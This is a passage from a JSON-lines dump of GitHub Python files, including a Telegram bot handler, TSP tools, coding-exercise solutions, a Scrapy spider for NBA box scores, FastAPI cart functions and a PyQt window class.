@router.callback_query(StateFilter(FSMMailing.change_group))\nasync def process_change_group(callback: CallbackQuery, state: FSMContext, lexicon: TranslatorRunner, session: AsyncSession):\n    data = await state.get_data()\n    mailing_id = data['mailing_id']\n\n    try:\n        await change_group(session, int(mailing_id), int(callback.data))\n        current_page = data['current_page']\n        group_dict = data['result_dict']\n        group_name = group_dict[str(current_page)][callback.data]\n        keyboard = await get_back_keyboad(lexicon)\n        await callback.message.edit_text(text=lexicon.group.changed(name=group_name), reply_markup=keyboard)\n        await state.set_state(FSMMailing.group_changed)\n    except AttributeError:\n        keyboard = await get_back_keyboad(lexicon)\n        await callback.message.edit_text(text=lexicon.mailing.notfound(), reply_markup=keyboard)\n        await state.set_state(FSMMailing.error_state)\n\n\n","repo_name":"ChronoDi/AutoPostingBot","sub_path":"tg_bot/handlers/admin/mailing/edit_mailing/change_group.py","file_name":"change_group.py","file_ext":"py","file_size_in_byte":2936,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"31738969289","text":"from pyrsistent import b\n\n\ndef processCmd(cmd):\n    cmd_name = ''\n    para_list = []\n    new_cmd = cmd.replace(' ','',) # remove space\n    para_num = new_cmd.count('/')\n    if para_num == 0:\n        cmd_name = new_cmd\n    else:\n        cmd_list = new_cmd.split('/')\n        cmd_name = cmd_list[0]\n        para_list = cmd_list[1: -1]\n        para_list.append(cmd_list[-1])\n    return cmd_name, para_list\n","repo_name":"LucasXingg/Game-of-Life","sub_path":"cmdOperation.py","file_name":"cmdOperation.py","file_ext":"py","file_size_in_byte":405,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"17415862547","text":"# Common tools used for multiple algorithms\nfrom math import sqrt\nimport os\n\n\n
class Node:\n    \"\"\"A single node on a map for readability\"\"\"\n\n    def __init__(self, index, x, y):\n        self.index = index\n        self.x = x\n        self.y = y\n\n\n# Finds the distance between two nodes\ndef find_dist(node_a, node_b):\n    \"\"\"Finds the distance between two given points\"\"\"\n    return sqrt((node_a.x - node_b.x) ** 2 +\n                (node_a.y - node_b.y) ** 2)\n\n
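# Quick check (sketch): find_dist(Node(0, 0.0, 0.0), Node(1, 3.0, 4.0)) == 5.0 --\n# the classic 3-4-5 right triangle.\n\n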
class Tour:\n    \"\"\"A whole map. Contains the route, filename and a variety of tools\"\"\"\n\n    def __init__(self):\n        self.route = []\n        self._last_measured = [] # Updates whenever get_dist is used\n        self._file_name = \"\"\n        self._distance = -1\n\n        self.run_time = 0\n        self.date_solved = \"\"\n        self.algorithm_name = \"\"\n        self.comment = \"\"\n\n    def __len__(self):\n        \"\"\"Overloads the len() function for readability\"\"\"\n        return len(self.route)\n\n
    def find_nodes(self, file_name):\n        \"\"\"Imports all the nodes in the city\"\"\"\n        # Make sure route is clear\n        self.route.clear()\n        # Get the file open\n\n        self._file_name = file_name\n        file_path = ''\n        if os.path.isabs(self._file_name):\n            file_path = self._file_name\n        else:\n            file_path = \"TSP_EUC/\" + self._file_name\n        file = open(file_path, \"r\")\n        # The coordinates always start on the 7th line so just skip to it\n        for line in file:\n            if \"COMMENT\" in line:\n                self.comment = line[10:-1]\n            elif \"NODE_COORD_SECTION\" in line:\n                break\n\n        # Find all the nodes\n        for line in file:\n            if \"EOF\" not in line:\n                line = line.split()\n                self.route.append(Node(float(line[0]), float(line[1]), float(line[2])))\n            else:\n                break\n\n
    def get_dist(self):\n        \"\"\"Finds the length of the tour\"\"\"\n        # If it's already found just return it\n        if self.route == self._last_measured:\n            return self._distance\n        self._distance = 0\n        for i in range(len(self.route) - 1):\n            self._distance += find_dist(self.route[i], self.route[i + 1])\n        # Return back to starting point\n        self._distance += find_dist(self.route[-1], self.route[0])\n        # Reset _last_measured\n        self._last_measured = self.route.copy()\n        return self._distance\n\n
    def print_map(self):\n        \"\"\"Prints the map in the specified format\"\"\"\n        print(self._file_name)\n        printed_points = []\n\n        print(\"Tour Length: \", self.get_dist())\n        print(\"Tour:\")\n        for point in self.route:\n            if point.index in printed_points:\n                # Announce there's a duplicate if one's found\n                print(\"ERROR: Duplicate found\", point.index)\n            print(point.index)\n            printed_points.append(point.index)\n        print(\"-1\")\n        # Report any missing nodes\n        for i in range(len(self.route)):\n            if i + 1 not in printed_points:\n                print(\"Node\", i, \"seems to be missing!\")\n","repo_name":"zelestis/TravellingSalesPersonPython","sub_path":"TSP_tools.py","file_name":"TSP_tools.py","file_ext":"py","file_size_in_byte":3115,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"6728594694","text":"from sys import stdin\n\nT = int(stdin.readline())\nfor i in range(T):\n    N = int(input())\n    arr = list(map(lambda x: int(x) - 1, input().split()))\n    checked = [False for i in range(N)]\n\n    res = 0\n    for i in range(N):\n        if checked[i]:\n            continue\n        res += 1\n        checked[i] = True\n        j = arr[i]\n\n        while not checked[j]:\n            checked[j] = True\n            j = arr[j]\n\n    print(res)\n","repo_name":"woohyunjng/Coding-Practice","sub_path":"Python/Baekjoon/10000/10451.py","file_name":"10451.py","file_ext":"py","file_size_in_byte":430,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"18874445037","text":"T = 10\r\n# Multiple test cases are given, so handle each one.\r\nfor test_case in range(1, T+1):\r\n    n=int(input())# read the palindrome length\r\n    arr =[list(input()) for i in range(100)]# read the letter board\r\n    max_list=[0,0]\r\n\r\n    # for-loops that search the rows and columns for palindromes\r\n    for i in range(100):# column\r\n        for i2 in range(100):# row\r\n            li1 = []\r\n            li2 = []\r\n            for i3 in range(i2,100):# check the palindromes inside one row/column\r\n                li1+=arr[i][i3]\r\n                li2 += arr[i3][i]\r\n
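                # li1 grows rightwards along row i and li2 downwards along column i;\r\n                # a slice is a palindrome when it equals its own reverse, and only\r\n                # the longest such length is kept per direction.\r\n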
                if ''.join(reversed(li1))==''.join(li1) and len(li1)>max_list[0]:\r\n                    max_list[0]=len(li1)\r\n                if ''.join(reversed(li2))==''.join(li2) and len(li2)>max_list[1]:\r\n                    max_list[1]=len(li2)\r\n    print('#{} {}'.format(test_case,max(max_list)))# print the longest length","repo_name":"world970511/study","sub_path":"ssafy_ready/1216.py","file_name":"1216.py","file_ext":"py","file_size_in_byte":874,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"16951573921","text":"# -*- coding: utf-8 -*-\nimport dateutil.parser\nimport pandas as pd\nimport scrapy\nfrom parsel import Selector\nfrom scrapy.http import Request\nfrom nba.items import PerfItem\n\n
conference_map = {\n    \"Atlanta Hawks\": \"E\",\n    \"Boston Celtics\": \"E\",\n    \"Brooklyn Nets\": \"E\",\n    \"Charlotte Bobcats\": \"E\",\n    \"Charlotte Hornets\": \"E\",\n    \"Chicago Bulls\": \"E\",\n    \"Cleveland Cavaliers\": \"E\",\n    \"Dallas Mavericks\": \"W\",\n    \"Denver Nuggets\": \"W\",\n    \"Detroit Pistons\": \"E\",\n    \"Golden State Warriors\": \"W\",\n    \"Houston Rockets\": \"W\",\n    \"Indiana Pacers\": \"E\",\n    \"Los Angeles Clippers\": \"W\",\n    \"Los Angeles Lakers\": \"W\",\n    \"Memphis Grizzlies\": \"W\",\n    \"Miami Heat\": \"E\",\n    \"Milwaukee Bucks\": \"E\",\n    \"Minnesota Timberwolves\": \"W\",\n    \"New Jersey Nets\": \"E\",\n    \"New Orleans Hornets\": \"E\",\n    \"New Orleans Pelicans\": \"W\",\n    \"New Orleans/Oklahoma City Hornets\": \"W\",\n    \"New York Knicks\": \"E\",\n    \"Oklahoma City Thunder\": \"W\",\n    \"Orlando Magic\": \"E\",\n    \"Philadelphia 76ers\": \"E\",\n    \"Phoenix Suns\": \"W\",\n    \"Portland Trail Blazers\": \"W\",\n    \"Sacramento Kings\": \"W\",\n    \"San Antonio Spurs\": \"W\",\n    \"Seattle SuperSonics\": \"W\",\n    \"Toronto Raptors\": \"E\",\n    \"Utah Jazz\": \"W\",\n    \"Vancouver Grizzlies\": \"W\",\n    \"Washington Wizards\": \"E\",\n}\n\n\n
class PerfSpider(scrapy.Spider):\n    name = \"perf\"\n    allowed_domains = [\"basketball-reference.com\"]\n    start_urls = [\"http://basketball-reference.com/\"]\n    custom_settings = {\n        # exported fields and order\n        \"FEED_EXPORT_FIELDS\": [\n            \"date\",\n            \"team\",\n            \"conference\",\n            \"pace\",\n            \"ortg\",\n            \"free_throw_rate\",\n            \"three_pt_att_rate\",\n            \"true_shooting_pct\",\n            \"total_rebound_pct\",\n            \"team_steal_pct\",\n            \"team_block_pct\",\n            \"effective_fg_pct\",\n            \"turnovers_per100\",\n            \"off_rebound_pct\",\n            \"def_rebound_pct\",\n        ]\n    }\n\n
    def start_requests(self):\n        seasons = range(2001, 2020)\n        urls = [\n            f\"https://www.basketball-reference.com/leagues/NBA_{season}_games.html\"\n            for season in seasons\n        ]\n        return [Request(url=url) for url in urls]\n\n    def parse(self, response):\n        # Go to each month page\n        xp = \"//div[@class='filter']/div/a/@href\"\n        urls = response.xpath(xp).extract()\n        yield from [\n            Request(url=response.urljoin(url), callback=self.parse_month)\n            for url in urls\n        ]\n\n    def parse_month(self, response):\n        # Go to the Box Score page for each game\n        xp = \"//td[@data-stat='box_score_text']/a/@href\"\n        urls = response.xpath(xp).extract()\n        yield from [\n            Request(url=response.urljoin(url), callback=self.parse_box) for url in urls\n        ]\n\n    def parse_box(self, response):\n        # Extract performance metrics for each team\n        teams_xp = \"//a[@itemprop='name']/text()\"\n        info_xp = \"//div[@class='scorebox_meta']/div/text()\"\n        teams = response.xpath(teams_xp).extract()\n        date_ = response.xpath(info_xp).extract_first()\n        date_ = dateutil.parser.parse(date_)\n        game_date = f\"{date_.date()}\"\n\n
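        # basketball-reference serves the four-factors box (which holds pace) inside\n        # an HTML comment, so a plain XPath cannot see it; the lines below pull the\n        # comment node out, strip the comment delimiters, and re-parse the payload\n        # with a fresh Selector.\n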
        pace_xp = '//td[@data-stat=\"off_rtg\"]/text()'\n        pace_comment_xp = \"//comment()[contains(., 'Pace Factor')]\"\n\n        comment = (\n            response.xpath(pace_comment_xp)\n            .extract_first()\n            .replace(\"<!--\", \"\").replace(\"-->\", \"\")\n        )\n        sel = Selector(comment)\n        pace = sel.xpath(pace_xp).extract()\n\n        ftr_xp = '//tfoot/tr/td[@data-stat=\"fta_per_fga_pct\"]/text()'\n        tpar_xp = '//tfoot/tr/td[@data-stat=\"fg3a_per_fga_pct\"]/text()'\n        tshp_xp = '//tfoot/tr/td[@data-stat=\"ts_pct\"]/text()'\n        trp_xp = '//tfoot/tr/td[@data-stat=\"trb_pct\"]/text()'\n        stp_xp = '//tfoot/tr/td[@data-stat=\"stl_pct\"]/text()'\n        bp_xp = '//tfoot/tr/td[@data-stat=\"blk_pct\"]/text()'\n        efgp_xp = '//tfoot/tr/td[@data-stat=\"efg_pct\"]/text()'\n        tp100_xp = '//tfoot/tr/td[@data-stat=\"tov_pct\"]/text()'\n        orp_xp = '//tfoot/tr/td[@data-stat=\"orb_pct\"]/text()'\n        drp_xp = '//tfoot/tr/td[@data-stat=\"drb_pct\"]/text()'\n\n
        df = pd.DataFrame(\n            {\n                \"date\": [game_date] * 2,\n                \"team\": teams,\n                \"conference\": [conference_map[team] for team in teams],\n                \"pace\": pace,\n                \"free_throw_rate\": response.xpath(ftr_xp).extract(),\n                \"three_pt_att_rate\": response.xpath(tpar_xp).extract(),\n                \"true_shooting_pct\": response.xpath(tshp_xp).extract(),\n                \"total_rebound_pct\": response.xpath(trp_xp).extract(),\n                \"team_steal_pct\": response.xpath(stp_xp).extract(),\n                \"team_block_pct\": response.xpath(bp_xp).extract(),\n                \"effective_fg_pct\": response.xpath(efgp_xp).extract(),\n                \"turnovers_per100\": response.xpath(tp100_xp).extract(),\n                \"off_rebound_pct\": response.xpath(orp_xp).extract(),\n                \"def_rebound_pct\": response.xpath(drp_xp).extract(),\n            }\n        )\n        numeric_columns = [\n            c for c in df.columns if c not in [\"date\", \"team\", \"conference\"]\n        ]\n        for c in numeric_columns:\n            df[c] = df[c].astype(float)\n\n        records = df.to_dict(orient=\"records\")\n        for rec in records:\n            yield PerfItem(rec)\n","repo_name":"dvukolov/nba-conference","sub_path":"scrapy/nba/spiders/perf.py","file_name":"perf.py","file_ext":"py","file_size_in_byte":5449,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"18481495221","text":"#_*_coding:utf8\n# function that computes the number of days between the two dates\ndef calc_dias(data_paga,data_venc):\n    partes1=data_paga.split(\"/\")\n    partes2=data_venc.split(\"/\")\n    anos=int(partes1[2])-int(partes2[2])\n    meses=int(partes1[1])-int(partes2[1])\n    dias=int(partes1[0])-int(partes2[0])+31*(meses)+365*(anos)\n    return dias\n# function that validates a date\ndef check_data(data):\n    try:\n        partes=data.split(\"/\")\n        if len(partes[2])!=4 or len(partes)!=3:\n            return False\n        elif int(partes[1])>12 or 1>int(partes[1]):\n            return False\n        elif int(partes[0])>31 or 1>int(partes[0]):\n            return False\n        return True\n    except:\n        return(False)\n
documentos=[]\nfor i in range(2):\n    doc={}\n    n_documento=int(input(\"Insira o número do documeto: \"))\n    cod_cliente = input(\"Insira o código do cliente: \")\n    # Loop to validate the dates.\n    run=True\n    while run:\n        data_vencimento=input(\"Insira a data de vencimento no formato dd/dd/dddd: \")\n        data_pagamento=input(\"Insira a data de pagamento no formato dd/dd/dddd:\")\n        if not(check_data(data_vencimento)) or not(check_data(data_pagamento)):\n            print(\"Data Inválida!\")\n        else:\n            run=False\n        \n    valor_conta=float(input(\"Insira o valor da conta: \"))\n    valor_juros=0\n    # insert the data into the doc dict.\n    doc[\"n_documento\"]=n_documento\n    doc[\"cod_cliente\"]=cod_cliente\n    doc[\"data_vencimento\"]=data_vencimento\n    doc[\"data_pagamento\"]=data_pagamento\n    doc[\"valor_conta\"]=valor_conta\n    doc[\"valor_juros\"]=valor_juros\n    documentos.append(doc)\n    print(\"\\n\\n\")\ntotal=0\nfor k in documentos:\n    
dias=calc_dias(k[\"data_pagamento\"],k[\"data_vencimento\"])\n juros=(0.0002*k[\"valor_conta\"])*dias\n k[\"valor_juros\"]=juros\n total+=k[\"valor_conta\"]+k[\"valor_juros\"]\n\nprint(\"O total arrecadado com juros é de %.2f\" %(total))\n","repo_name":"MatheusSC23/FUP","sub_path":"Lista_08/4.py","file_name":"4.py","file_ext":"py","file_size_in_byte":1883,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"32283791135","text":"import sys\nsys.setrecursionlimit(3000000)\ninput = sys.stdin.readline\n\n\nn,m = map(int,input().split())\n# n이 가로 m 이 세로\nw=b=0\n\ndx= [1,0,-1,0]\ndy = [0,1,0,-1]\n\nvisited= [[False]*n for _ in range(m)]\n\nprint(visited)\n\n\ndef dfs(x,y,cnt):\n c=graph[x][y]\n graph[x][y]=1\n for i in range(4):\n nx = dx[i]+x\n ny = dy[i]+y\n if(0<= nx X (' + _tmp + '))']\n if s_state in trans_sys1.states.initial:\n _goto = ' || '.join(\n ['(' + statevar + ' = \"' + str(x) + '\" )' for x in trans_red.states.post(str(s_state))])\n sys_init += [_tmp + ' && ' + ' ( ' + _goto + ' ) ']\n trans_red.states.remove(str(s_state))\n\n # Remove unneeded labels\n trans_red.ap.remove('env_s')\n\n # Create needed additional specifications\n # - Environment variables and assumptions\n env_vars = list()\n env_init = list()\n env_safe = list()\n env_prog = list() # ['(env_actions= \"' + reach + '\")']\n\n # - System variables and requirements\n sys_vars = [x for x in trans_sys1.ap] # we assign the labels\n # to the control system (otherwise the GR1 synthesis will blow up the control synthesis)\n sys_prog = list()\n gr_sys = synth.sys_to_spec(trans_red, True, statevar)\n\n add_specs = gr_sys | spec.GRSpec(env_vars, sys_vars, env_init, sys_init,\n env_safe, sys_safe, env_prog, sys_prog)\n\n\n else:\n\n trans_red = trans_sys2.copy()\n reach = 'reach'\n stay = 'stay'\n sys_safe = list() # list of transitions to be added to the GR(1) specification\n sys_init = list()\n\n trans_red.actions['env_actions'] |= {reach, stay} # these are the action of the environment\n for s_state in trans_sys1.states():\n logger.info('removing state :' + str(s_state))\n labels = trans_sys1.states[s_state]\n _tmp = print_aps(labels, trans_sys1.ap)\n\n for (tr_state1, tr_state2) in it_product(trans_red.states.pre(str(s_state)),\n trans_red.states.post(str(s_state))):\n trans_red.transitions.add(tr_state1, tr_state2, env_actions=reach)\n for tr_state in trans_red.states.pre(str(s_state)):\n trans_red.transitions.add(tr_state, tr_state, env_actions=stay)\n sys_safe += ['(((' + statevar + ' = \"' + tr_state + '\") && X ( env_actions = \"' + reach + '\")) -> X ('\n + _tmp + '))']\n if s_state in trans_sys1.states.initial:\n _goto = ' || '.join(\n ['(' + statevar + ' = \"' + str(x) + '\" )' for x in trans_red.states.post(str(s_state))])\n sys_init += [_tmp + ' && ' + ' ( ' + _goto + ' ) ']\n trans_red.states.remove(str(s_state))\n\n for x in trans_sys1.ap:\n sys_safe += ['( !' + str(x) + ' & X ( env_actions = \"stay\")) -> ( X !' 
+ str(x) + ')']\n sys_safe += ['( ' + str(x) + ' & X ( env_actions = \"stay\")) -> ( X ' + str(x) + ')']\n\n # Remove unneeded labels\n trans_red.ap.remove('env_s')\n\n # Create needed additional specifications\n # - Environment variables and assumptions\n env_vars = list()\n env_init = list()\n env_safe = list()\n env_prog = list() # ['(env_actions= \"' + reach + '\")']\n\n # - System variables and requirements\n sys_vars = [x for x in trans_sys1.ap] # we assign the labels\n # to the control system (otherwise the GR1 synthesis will blow up the control synthesis)\n sys_prog = list()\n\n add_specs = spec.GRSpec(env_vars, sys_vars, env_init, sys_init,\n env_safe, sys_safe, env_prog, sys_prog)\n\n if fullmodel:\n return trans_red, add_specs, trans_sys2\n return trans_red, add_specs\n\n\n\ndef async_prod(self, ts,ap = False,relabel=True):\n \"\"\"Asynchronous product TS1 x TS2 between FT Systems.\n\n See Also\n ========\n __or__, sync_prod, cartesian_product\n Def. 2.18, p.38 U{[BK08]\n }\n \"\"\"\n\n if not isinstance(ts, FiniteTransitionSystem):\n raise TypeError('ts must be a FiniteTransitionSystem.')\n\n prod_ts = transys.FiniteTransitionSystem()\n\n # Add all atomic propositions\n prod_ts.owner=self.owner\n prod_ts.name=self.name + '_' + ts.name\n # for parallel product: union of action sets\n prod_ts.actions['sys_actions'] |= self.actions['sys_actions'] | ts.actions['sys_actions']\n prod_ts.actions['env_actions'] |= self.actions['env_actions'] | ts.actions['env_actions']\n prod_aux = nx.product.cartesian_product(self, ts)\n state_to_i = dict((n, i) for (i, n) in enumerate(prod_aux.nodes()))\n\n i_to_state = dict((i,i) for (i, n) in enumerate(prod_aux.nodes()))\n\n for state,i in state_to_i.items():\n if ap == True:\n prod_ts.atomic_propositions |= {str(self.node[state[0]]['ap'] | ts.node[state[1]]['ap'])}\n prod_ts.add_node(i, ap={str(self.node[state[0]]['ap'] | ts.node[state[1]]['ap'])})\n else :\n\n prod_ts.add_node(i)\n # Assume for a moment that each of the system has atomic proposition\n for key in ts.node[state[1]].keys():\n if ('ap' == key) and (ts.node[state[1]]['ap']!= set()):\n prod_ts.node[i]['ap_' + ts.name] = ts.node[state[1]]['ap']\n elif 'ap_' in key:\n prod_ts.node[i][key] = ts.node[state[1]][key]\n\n for key in self.node[state[0]].keys():\n if ('ap' == key) and (self.node[state[0]]['ap'] != set()):\n prod_ts.node[i]['ap_' + self.name] = self.node[state[0]]['ap']\n else:\n prod_ts.node[i][key] = self.node[state[0]][key]\n\n\n for edge in prod_aux.edges():\n #print(edge)\n for _x, _y, label in self.transitions.find({edge[0][0]}, {edge[1][0]}):\n #print([_x, _y, label])\n prod_ts.transitions.add(state_to_i[edge[0]], state_to_i[edge[1]], **label)\n for _x, _y, label in ts.transitions.find({edge[0][1]}, {edge[1][1]}):\n #print([_x, _y, label])\n prod_ts.transitions.add(state_to_i[edge[0]], state_to_i[edge[1]], **label)\n\n for (initx, inity) in product(self.states.initial, ts.states.initial):\n prod_ts.states.initial |= {state_to_i[(initx, inity)]}\n\n\n return prod_ts\n\n\ndef fts2mealy(ts, env_name='move', reach_name='reach'):\n \"\"\" \n Get a mealy machine with reach + move state on all transitions \n Parameters\n ----------\n ts : FTS \n env_name='move' : label for on transitions environment action\n reach='reach' : ouput of each transition\n\n \"\"\"\n h = transys.MealyMachine()\n\n mlist = list()\n for node in ts.nodes():\n mlist += [node]\n\n inputs = transys.machines.create_machine_ports(dict({env_name: mlist}))\n h.add_inputs(inputs)\n outputs = 
transys.machines.create_machine_ports(dict({reach_name: 'boolean'}))\n h.add_outputs(outputs)\n\n h.add_nodes_from(ts.nodes())\n for (st1, st2) in ts.transitions():\n q = {reach_name: 1, env_name: st2}\n h.transitions.add(st1, st2, **dict(q))\n\n for init in ts.states.initial:\n h.states.initial |= {init}\n\n return h\n\n\n\ndef fts2SC(ts, env_name='ctrl', act='act'):\n \"\"\" \n Get a mealy machine with reach + move state on all transitions \n Parameters\n ----------\n ts : FTS \n env_name='move' : label for on transitions environment action\n reach='reach' : ouput of each transition\n\n \"\"\"\n h = transys.MealyMachine()\n\n mlist = list()\n for node in ts.nodes():\n mlist += [node]\n\n inputs = transys.machines.create_machine_ports(dict({env_name: mlist}))\n h.add_inputs(inputs)\n outputs = transys.machines.create_machine_ports(dict({act: mlist}))\n h.add_outputs(outputs)\n\n h.add_nodes_from(ts.nodes())\n for (st1, st2) in ts.transitions():\n q = {env_name: st2, act:st2}\n h.transitions.add(st1, st2, **dict(q))\n h.add_node('Minit')\n h.states.initial|={'Minit'}\n for init in ts.states.initial:\n q = {env_name: init, act: init}\n h.transitions.add('Minit', init, **dict(q))\n return h\n\n\ndef trans_complete(ts):\n \"\"\"Complete FTS with selfloops for all alternative system actions\n Specifically go from a TransSys1 to TransSys2: \n TransSys1\n * Nodes = represent locations or states, owned by environment\n * Edges = control actions by system ending in a new state\n\n\n TransSys2:\n * Nodes = Represents a move towards a specific state (owned by environment)\n * Edges = contains Arrival at state (dictated by environment) + decision to move to new state\n\n @param trans_sys1: FiniteTransitionSystem()\n @param statevar: string name of locations in trans_sys1\n\n\n \"\"\"\n # - - - - Check incoming arguments - - - - - - - -\n # 1 Check whether the given transition system is actually a transition system\n\n\n assert ts.owner == \"env\"\n ts_new = ts.copy()\n\n for state in ts_new.states:\n for act in ts_new.actions['sys_actions']:\n logger.info(' action %s ' % act)\n if ts_new.transitions.find(from_states=state,with_attr_dict={'sys_actions':act}) == []:\n ts_new.transitions.add(state,state,sys_actions = act)\n return ts_new","repo_name":"shaesaert/C-TuLiP","sub_path":"Interface/Transform.py","file_name":"Transform.py","file_ext":"py","file_size_in_byte":14829,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"34544814080","text":"from .transformations import TransformerList\n\nfrom .transformations import (\n ChoicesToListFW,\n DumpExtraneousAnchorsFW,\n RemoveTranslatedFromRootFW,\n RenameKuidToAnchor,\n ReplaceTruthyStrings,\n SettingsChoicesToListFW,\n XlsformRenames,\n XlsformTranslations,\n)\n\n\nclass ExportConfigs(TransformerList):\n schema = '2'\n flat = False\n immutable = False\n remove_nulls = False\n transformers = ()\n default_settings = ()\n\n def __init__(self, **kwargs):\n for key in list(kwargs):\n if hasattr(self, key):\n val = kwargs.pop(key)\n setattr(self, key, val)\n super().__init__(**kwargs)\n\n def fw(self, content, **kwargs):\n return self._apply_transformers(content, direction='fw', **kwargs)\n\nclass DefaultExportConfigs(ExportConfigs):\n schema = '2'\n flat = False\n\nclass DefaultExportConfigsSchema1(ExportConfigs):\n schema = '1'\n flat = True\n transformers = (\n SettingsChoicesToListFW,\n )\n\nclass XlsformExport(ExportConfigs):\n schema = '1'\n flat = True\n transformers = (\n 
ReplaceTruthyStrings,\n DumpExtraneousAnchorsFW,\n XlsformRenames,\n XlsformTranslations,\n RemoveTranslatedFromRootFW,\n SettingsChoicesToListFW,\n )\n\n\nclass KoboXlsformExport(ExportConfigs):\n schema = '1'\n flat = True\n transformers = (\n ReplaceTruthyStrings,\n RenameKuidToAnchor,\n ChoicesToListFW,\n )\n","repo_name":"dorey/a1d05eba1","sub_path":"a1d05eba1/export_configs.py","file_name":"export_configs.py","file_ext":"py","file_size_in_byte":1472,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"1018757660","text":"from sqlalchemy.orm import Session\n\nfrom . import models, schemas\n\n\ndef get_items(db: Session, skip: int = 0, limit: int = 100):\n print(db.query(models.Item).offset(skip).limit(limit).all())\n return db.query(models.Item).offset(skip).limit(limit).all()\n\n\ndef get_item(db: Session, id: id):\n item = db.query(models.Item).get(id).__dict__\n print(\"item\")\n\n print(item)\n return db.query(models.Item).get(id).__dict__\n\n\ndef get_cart(db: Session, id: id):\n print(dir(db.query(models.Cart).get(id)))\n query = db.query(models.Cart).get(id)\n output = {\"cartitems\": query.cartitems, \"id\": query.id}\n print(\"output\")\n print(output)\n return db.query(models.Cart).get(id)\n\n\n# def get_display_cart(db: Session, id: id)\n# cart = get_cart(id)\n# cart_items = [ cart_item.__dict__ for cart_item in cart.cartitems]\n# new_cart =\n# for cart_item in cart_items:\n# item = get_item(cart_item.item_id)\n# new_cart_item = {cart_item[k] = v for (k,v) in item }\n\n\ndef create_item(db: Session, item: schemas.ItemCreate):\n db_item = models.Item(**item.dict())\n print(db_item)\n db.add(db_item)\n db.commit()\n db.refresh(db_item)\n return db_item\n\n\ndef create_cart_item(db: Session, cart_id, item_id):\n item = db.query(models.Item).get(cart_id)\n cart = db.query(models.Cart).get(item_id)\n db_item = models.CartItem(\n item=db.query(models.Item).get(item_id),\n cart=db.query(models.Cart).get(cart_id),\n quantity=1,\n )\n print(db_item)\n db.add(db_item)\n db.commit()\n db.refresh(db_item)\n return db_item\n\n\ndef create_cart(\n db: Session,\n # cart,\n item_id,\n):\n # db_item = models.Cart(**cart.dict())\n # db_item = models.Cart(items=[db.query(models.Item).get(item_id)])\n cart = models.Cart(cartitems=[])\n print(cart)\n db.add(cart)\n # db.add(cart)\n db.commit()\n db.refresh(cart)\n return cart\n\n\ndef add_to_cart(db: Session, cart_id, item_id, remove=False):\n # def create_user_item(db: Session, item: schemas.ItemCreate, user_id: int):\n print(\"herro\")\n cart = db.query(models.CartItem).filter(models.CartItem.cart_id == cart_id).first()\n\n print(\"cart\")\n print(cart)\n print(\"cartid\")\n print(cart_id)\n print(\"item_id\")\n print(item_id)\n cart_item_result = db.query(models.CartItem).filter(\n models.CartItem.cart_id.like(cart_id),\n models.CartItem.item_id.like(item_id),\n )\n print(\"first\")\n print(cart_item_result.first())\n cart_item = cart_item_result.first()\n print(\"cart_item\")\n print(cart_item)\n\n if remove:\n cart_item.quantity -= 1\n if cart_item.quantity == 0:\n db.delete(cart_item)\n else:\n if cart_item == None:\n print(\"no cart item\")\n cart_item = models.CartItem(\n item=db.query(models.Item).get(item_id),\n cart=db.query(models.Cart).get(cart_id),\n quantity=1,\n )\n print(cart_item)\n print(\"quantity\")\n print(cart_item.quantity)\n db.add(cart_item)\n db.commit()\n db.refresh(cart_item)\n else:\n print(cart_item.quantity)\n if cart_item.quantity == None:\n 
cart_item.quantity = 1\n cart_item.quantity += 1\n\n item = db.query(models.Item).get(item_id)\n cart = db.query(models.Cart).get(cart_id)\n print(\"cart\")\n print(cart)\n db.commit()\n return cart\n\n\ndef add_to_cart_new(db: Session, cart_id, item_id):\n cart_item = create_cart_item(db, cart_id, item_id)\n cart = db.query(models.Cart).get(cart_id)\n return cart\n\n\ndef remove_from_cart(db: Session, cart_id, item_id):\n pass\n","repo_name":"whiterabbitcoding/ecommerce-backend-fastapi","sub_path":"app/sql_app/crud.py","file_name":"crud.py","file_ext":"py","file_size_in_byte":3719,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"70749415162","text":"import sys\nfrom PyQt5 import QtWidgets as qtw\nfrom PyQt5.QtGui import QIcon\nfrom PyQt5.QtCore import pyqtSlot\n\nfrom MainWidget import MainWidget\n\n\nclass App(qtw.QMainWindow):\n\n def __init__(self, parentApp, data):\n super().__init__()\n self.title = 'OCVID OpenCV Integrated Development'\n self.left = 0\n self.top = 0\n self.width = 640\n self.height = 480\n self.setWindowTitle(self.title)\n self.setGeometry(self.left, self.top, self.width, self.height)\n self.parent = parentApp\n self.setWindowIcon(QIcon('./opencv-logo.ico'))\n self.data = data\n self.data.app = self\n\n self.table_widget = MainWidget(self)\n self.setCentralWidget(self.table_widget)\n self.statusBar().showMessage('Loaded.')\n self.initMenu()\n self.show()\n\n def initMenu(self):\n mainMenu = self.menuBar()\n fileMenu = mainMenu.addMenu('File')\n editMenu = mainMenu.addMenu('Edit')\n viewMenu = mainMenu.addMenu('View')\n #streamMenu = mainMenu.addMenu('Stream')\n #helpMenu = mainMenu.addMenu('Help')\n\n for x in qtw.QStyleFactory.keys():\n styleAct = qtw.QAction(QIcon(''), x, self)\n styleAct.setStatusTip('Set style to ' + x)\n styleAct.triggered.connect(lambda checked, style=x: self.handleStyleChanged(\n qtw.QStyleFactory.create(style)))\n viewMenu.addAction(styleAct)\n\n saveAct = qtw.QAction(QIcon(''), \"Save\", self)\n saveAct.setStatusTip('Save current python code')\n saveAct.setShortcut('Ctrl+S')\n saveAct.triggered.connect(self.handleSave)\n saveAsAct = qtw.QAction(QIcon(''), \"Save as...\", self)\n saveAsAct.setStatusTip('Save current python code as...')\n saveAsAct.setShortcut('Ctrl+Shift+S')\n saveAsAct.triggered.connect(self.handleSaveAs)\n loadAct = qtw.QAction(QIcon(''), 